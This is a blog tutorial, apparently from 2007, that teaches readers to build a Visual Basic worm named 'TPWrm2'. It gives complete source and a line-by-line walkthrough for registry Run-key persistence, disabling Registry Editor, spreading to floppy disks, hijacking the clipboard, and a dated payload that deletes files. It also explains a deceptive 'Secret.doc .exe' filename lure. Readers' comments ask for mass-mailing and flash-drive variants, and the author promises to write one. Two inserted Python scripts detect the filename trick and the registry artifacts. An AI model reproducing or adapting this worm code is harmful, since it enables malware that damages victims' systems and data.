
Worm Programming (again!!)

Written on June 5, 2007 by admin

This worm is named TPWrm2 (TutorialsPortal Worm 2). It is smarter than TPWrm1 because it uses WSH (Windows Script Host) to manipulate the registry and to detect special folders in the Windows operating system, and it prevents the user from running Registry Editor. Because of that, this worm can infect Windows 9x, ME, NT, 2000, and XP.

Algorithm

1. The worm uses a Word icon to deceive the user.

2. It checks whether the worm already exists on the computer system.

3. If the worm does not find itself, it copies itself to the Windows System folder and modifies the registry so that it runs automatically every time Windows starts.

4. Every 1 minute, it tries to copy itself to the floppy disk with the file name “lieke.exe”.

5. Every time the user pastes a sentence, a word, or anything else, the worm changes the pasted text to “Love Lieke So Much…”.

6. Every 13th October, the worm shows “TPWrm2 is in your computer”, deletes all files with the tmp extension in the Windows folder, and stops all worm activity on that day.

 

Coding

Create a new project and change the Project Name to TPWrm2. On the Make tab, change the Application Title to TPWrm2; on the Compile tab, set Compile to P-Code.

Add 2 Timers, and set the properties of each Timer and the form as follows:

Form1
Name: frmTPWrm2
Icon: (icon)
ShowInTaskbar: False
Visible: False

Timer1
Name: tmrTPWrm2
Enable: True
Interval: 60000

Timer2
Name: tmrLieke
Enable: True
Interval: 1000

Write this code:

Visual Basic:
  1. 'TPWrm2 By -RiE- @ tutorialsportal.com
  2. 'Bogor, West Java, Indonesia
  3. Option Explicit
  4.  
  5. Private Sub Form_Load()
  6. On Error Resume Next
  7. If App.PrevInstance = True Then End
  8. Call RegDisable
  9. Call InfectSystem
  10. If App.Path = "A:\" Or App.Path = "B:\" Then
  11. Unload Me
  12. End If
  13. End Sub
  14.  
  15. Private Sub tmrLieke_Timer()
  16. On Error Resume Next
  17. Clipboard.Clear
  18. Clipboard.SetText " Love Lieke So Much... "
  19. End Sub
  20.  
  21. Private Sub tmrTPWrm2_Timer()
  22. On Error Resume Next
  23. Call InfectFloppy
  24. If Day(Now) = 13 And Month(Now) = 10 Then
  25. Call PayLoad
  26. Unload Me
  27. End If
  28. End Sub
  29.  
  30. Function RegString(HiveAndKey As String, Value As String)
  31. Dim newbie As Variant
  32. Set newbie = CreateObject("Wscript.Shell")
  33. newbie.regwrite HiveAndKey, Value
  34. End Function
  35.  
  36. Function RegDword(HiveAndKey As String, Value As Integer)
  37. Dim newbie As Variant
  38. Set newbie = CreateObject("Wscript.Shell")
  39. newbie.regwrite HiveAndKey, Value, "REG_DWORD"
  40. End Function
  41.  
  42. Private Sub RegDisable()
  43. On Error Resume Next
  44. RegDword "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\" & _
  45. "System\DisableRegistryTools", 1
  46. End Sub
  47.  
  48. Private Sub InfectSystem()
  49. On Error Resume Next
  50. Dim kiddie As Variant
  51. Dim sysfolder As Object
  52. Set kiddie = CreateObject("scripting.filesystemobject")
  53. Set sysfolder = kiddie.GetSpecialFolder(1)
  54. FileCopy WormFile, sysfolder & "\" & "winfake.exe"
  55. RegString "HKLM\Software\Microsoft\Windows\CurrentVersio" & _
  56. "n\Run\windll", sysfolder & "\" & "winfake.exe"
  57. End Sub
  58.  
  59. Private Sub InfectFloppy()
  60. On Error Resume Next
  61. If Len(Dir$("A:\lieke.exe")) = 0 Then
  62. FileCopy WormFile, "A:\lieke.exe"
  63. End If
  64. End Sub
  65.  
  66. Private Sub PayLoad()
  67. On Error Resume Next
  68. Dim kiddie As Variant
  69. Dim winfolder, sysfolder, tmpfolder As Object
  70. Set kiddie = CreateObject("scripting.filesystemobject")
  71. Set winfolder = kiddie.GetSpecialFolder(0)
  72. Set sysfolder = kiddie.GetSpecialFolder(1)
  73. Set tmpfolder = kiddie.GetSpecialFolder(2)
  74. Kill winfolder & "\" & "*.tmp"
  75. Kill sysfolder & "\" & "*.bak"
  76. Kill tmpfolder & "\" & "*.*"
  77. MsgBox "TPWrm2 is in your computer..!"
  78. End Sub
  79.  
  80. Private Function WormFile()
  81. Dim WPath, WName As String
  82. WPath = App.Path
  83. If Right(WPath, 1) <> "\" Then
  84. WPath = WPath & "\"
  85. End If
  86. WName = App.EXEName & ".exe"
  87. WormFile = WPath & WName
  88. End Function

Compile this project: File > Make TPWrm2, and in File Name type "Secret.doc .exe".
We use Secret.doc .exe as the file name because when users see this file in Windows Explorer, they think that 'Secret' is a Word document and will execute the worm. Social Engineering, right??
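
A defender-side check for the naming trick described above, as an added example that is not part of the original post: it flags file names that display a document extension but actually end in an executable one, with whitespace padding of any length between the two. The extension sets and the sample listing are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

# Assumed sets: extensions Windows runs directly vs. ones users read as documents.
EXECUTABLE = {"exe", "scr", "com", "pif", "bat", "cmd"}
DECOY = {"doc", "docx", "xls", "pdf", "txt", "rtf", "jpg"}

# ".<decoy>", optional whitespace padding, then the real ".<ext>" at the end.
_PATTERN = re.compile(r"\.(?P<decoy>[^.\s]+)\s*\.(?P<real>[^.\s]+)\s*$")


def deceptive_extension(path):
    """Return (decoy, real) if the name looks like a document but is a program."""
    name = PureWindowsPath(path).name
    m = _PATTERN.search(name)
    if not m:
        return None
    decoy, real = m.group("decoy").lower(), m.group("real").lower()
    if decoy in DECOY and real in EXECUTABLE:
        return decoy, real
    return None


def scan(paths):
    """Return (path, decoy, real) for every deceptive name in a file listing."""
    return [(p, *hit) for p in paths if (hit := deceptive_extension(p))]


# Constructed sample listing; only the first and last two names should be flagged.
SAMPLE = [
    r"C:\Users\a\Desktop\Secret.doc .exe",
    r"A:\lieke.exe",
    r"C:\Docs\report.final.doc",
    r"C:\Tools\setup.exe",
    r"C:\Docs\invoice.PDF.scr",
    r"C:\Docs\notes.txt      .exe",
]

if __name__ == "__main__":
    for path, decoy, real in scan(SAMPLE):
        print(f"{path!r}: shown as .{decoy}, runs as .{real}")
```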

Source Code Description

Visual Basic:
  1. 'TPWrm2 By -RiE- @ tutorialsportal.com
  2. 'Bogor, West Java, Indonesia
  3. Option Explicit
  4.  
  5. Private Sub Form_Load()
  6. On Error Resume Next
  7. If App.PrevInstance = True Then End
  8. Call RegDisable
  9. Call InfectSystem
  10. If App.Path = "A:\" Or App.Path = "B:\" Then
  11. Unload Me
  12. End If
  13. End Sub

Call RegDisable executes the RegDisable procedure, and the statement Call InfectSystem executes the InfectSystem procedure.
If the main file is located on drive A or B, the main process is killed.

Visual Basic:
  1. Private Sub tmrLieke_Timer()
  2. On Error Resume Next
  3. Clipboard.Clear
  4. Clipboard.SetText " Love Lieke So Much... "
  5. End Sub

Clipboard.Clear clears the data from the Clipboard; the next statement inserts "Love Lieke So Much..." into the clipboard.

Visual Basic:
  1. Private Sub tmrTPWrm2_Timer()
  2. On Error Resume Next
  3. Call InfectFloppy
  4. If Day(Now) = 13 And Month(Now) = 10 Then
  5. Call PayLoad
  6. Unload Me
  7. End If
  8. End Sub

Every 60000 ms (60 seconds), the InfectFloppy procedure is executed; then, if the date is 13th October, the PayLoad procedure is executed and the worm process is killed.

Visual Basic:
  1. Function RegString(HiveAndKey As String, Value As String)
  2. Dim newbie As Variant
  3. Set newbie = CreateObject("Wscript.Shell")
  4. newbie.regwrite HiveAndKey, Value
  5. End Function
  6.  
  7. Function RegDword(HiveAndKey As String, Value As Integer)
  8. Dim newbie As Variant
  9. Set newbie = CreateObject("Wscript.Shell")
  10. newbie.regwrite HiveAndKey, Value, "REG_DWORD"
  11. End Function

These functions use Windows Script Host (WSH) to access the registry and add a key and value. The RegString function adds a key and value of type REG_SZ, and RegDword adds a key and value of type REG_DWORD.

Visual Basic:
  1. Private Sub RegDisable()
  2. On Error Resume Next
  3. RegDword "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\" & _
  4. "System\DisableRegistryTools", 1
  5. End Sub

The RegDisable procedure calls the RegDword function to add: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools with value: 1

Visual Basic:
  1. Private Sub InfectSystem()
  2. On Error Resume Next
  3. Dim kiddie As Variant
  4. Dim sysfolder As Object
  5. Set kiddie = CreateObject("scripting.filesystemobject")
  6. Set sysfolder = kiddie.GetSpecialFolder(1)
  7. FileCopy WormFile, sysfolder & "\" & "winfake.exe"
  8. RegString "HKLM\Software\Microsoft\Windows\CurrentVersio" & _
  9. "n\Run\windll", sysfolder & "\" & "winfake.exe"
  10. End Sub

The InfectSystem procedure uses the file system object to get a Special Folder in Windows. In this worm it is Special Folder 1, the Windows System folder; the worm then copies itself to the Windows System folder under the name "winfake.exe".
This procedure calls the RegString function to add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\windll with the Windows System folder path and winfake.exe as its value. This key is used to execute winfake.exe at every startup.
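
The registry changes made by RegDisable and InfectSystem leave artifacts a responder can check for. This added example (not code from the original post) parses the text of a regedit export and reports a non-zero DisableRegistryTools policy and Run entries that launch an executable from the Windows System folder; the export below is constructed and assumed to be already decoded to text.

```python
import re

RUN_KEY = r"\software\microsoft\windows\currentversion\run"
POLICY_KEY = r"\software\microsoft\windows\currentversion\policies\system"
# An .exe sitting directly in the Windows System folder (system or system32).
SYSTEM_EXE = re.compile(r"\\windows\\system(32)?\\[^\\]+\.exe", re.I)

def parse_reg(text):
    """Yield (key, value_name, data) from decoded regedit export text."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        m = re.match(r'"(.+?)"=(.*)$', line)
        if not (key and m):
            continue
        name, raw = m.groups()
        if raw.startswith("dword:"):
            yield key, name, int(raw[6:], 16)
        elif raw.startswith('"') and raw.endswith('"'):
            # REG_SZ: undo the export's backslash escaping (\\ and \").
            yield key, name, re.sub(r"\\(.)", r"\1", raw[1:-1])

def triage(text):
    """Return findings for the lockout and persistence artifacts described above."""
    findings = []
    for key, name, data in parse_reg(text):
        k = key.lower()
        if k.endswith(POLICY_KEY) and name.lower() == "disableregistrytools":
            if isinstance(data, int) and data != 0:
                findings.append(("registry-tools-disabled", key, name, data))
        elif k.endswith(RUN_KEY) and isinstance(data, str) and SYSTEM_EXE.search(data):
            findings.append(("run-entry-in-system-folder", key, name, data))
    return findings

# Constructed sample export (real exports are UTF-16; decode before parsing).
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windll"="C:\\WINDOWS\\system32\\winfake.exe"
"Updater"="\"C:\\Program Files\\Vendor\\updater.exe\" /background"
'''

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

The system-folder rule is a review heuristic: some legitimate Run entries also start programs from that folder, so compare hits against a known-good baseline for the host.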

Visual Basic:
  1. Private Sub InfectFloppy()
  2. On Error Resume Next
  3. If Len(Dir$("A:\lieke.exe")) = 0 Then
  4. FileCopy WormFile, "A:\lieke.exe"
  5. End If
  6. End Sub

This procedure copies the worm to drive A under the name "lieke.exe".

Visual Basic:
  1. Private Sub PayLoad()
  2. On Error Resume Next
  3. Dim kiddie As Variant
  4. Dim winfolder, sysfolder, tmpfolder As Object
  5. Set kiddie = CreateObject("scripting.filesystemobject")
  6. Set winfolder = kiddie.GetSpecialFolder(0)
  7. Set sysfolder = kiddie.GetSpecialFolder(1)
  8. Set tmpfolder = kiddie.GetSpecialFolder(2)
  9. Kill winfolder & "\" & "*.tmp"
  10. Kill sysfolder & "\" & "*.bak"
  11. Kill tmpfolder & "\" & "*.*"
  12. MsgBox "TPWrm2 is in your computer..!"
  13. End Sub

The PayLoad procedure uses the file system object to get special folder 0 (the Windows folder), special folder 1 (the Windows System folder), and special folder 2 (the Temporary folder). It then deletes all files with the 'tmp' extension in the Windows folder, all files with the 'bak' extension in the Windows System folder, and all files in the Temporary folder. Then the worm shows "TPWrm2 is in your computer..!"

Visual Basic:
  1. Private Function WormFile()
  2. Dim WPath, WName As String
  3. WPath = App.Path
  4. If Right(WPath, 1) <> "\" Then
  5. WPath = WPath & "\"
  6. End If
  7. WName = App.EXEName & ".exe"
  8. WormFile = WPath & WName
  9. End Function

The WormFile function returns the full path to the main file.


8 Comments on “Worm Programming (again!!)”

  1. TPWrm3 | TutorialsPortal |

    […] is same with previous tutorial […]

  2. harry |

    this is really cool.
    I'm only just learning vb to make viruses.
    I'm not very experienced and I'm having a hard time learning the script.
    I have 2 questions.
    1) all the Kill winfolder & “\” & “*.tmp” and Kill sysfolder & “\” & “*.bak”, can they be malicious to my computer while I am testing the virus?
    2) could you write a script that enters outlook express and posts the virus to all the people in the contact book?

    thnx

  3. -RiE- |

    thanks harry

    1. yes of course, so I recommend you install deep freeze first or use virtual pc
    2. yes, i will write it soon

  4. harry |

    phew!
    I was about to run it and screw up my computer
    thanx, nice save
    lol

  5. artur |

    hi there, I don’t know why, but when I click on Compile this project, File > Make TPWrm2 > in File Name type “Secret.doc .exe” it appears
    compile error
    “syntax error”
    need help
    plz write as soon as possible

  6. artur |

    my xp version is in portuguese may it be because of that

  7. johntotetwoo |

    detected by mcafee and kaspersky

  8. mahethere |

    how can i design a virus that starts running when I open the flash disk assuming that the virus is contained in the flash?
    please help. send reply to mahethere@yahoo.com
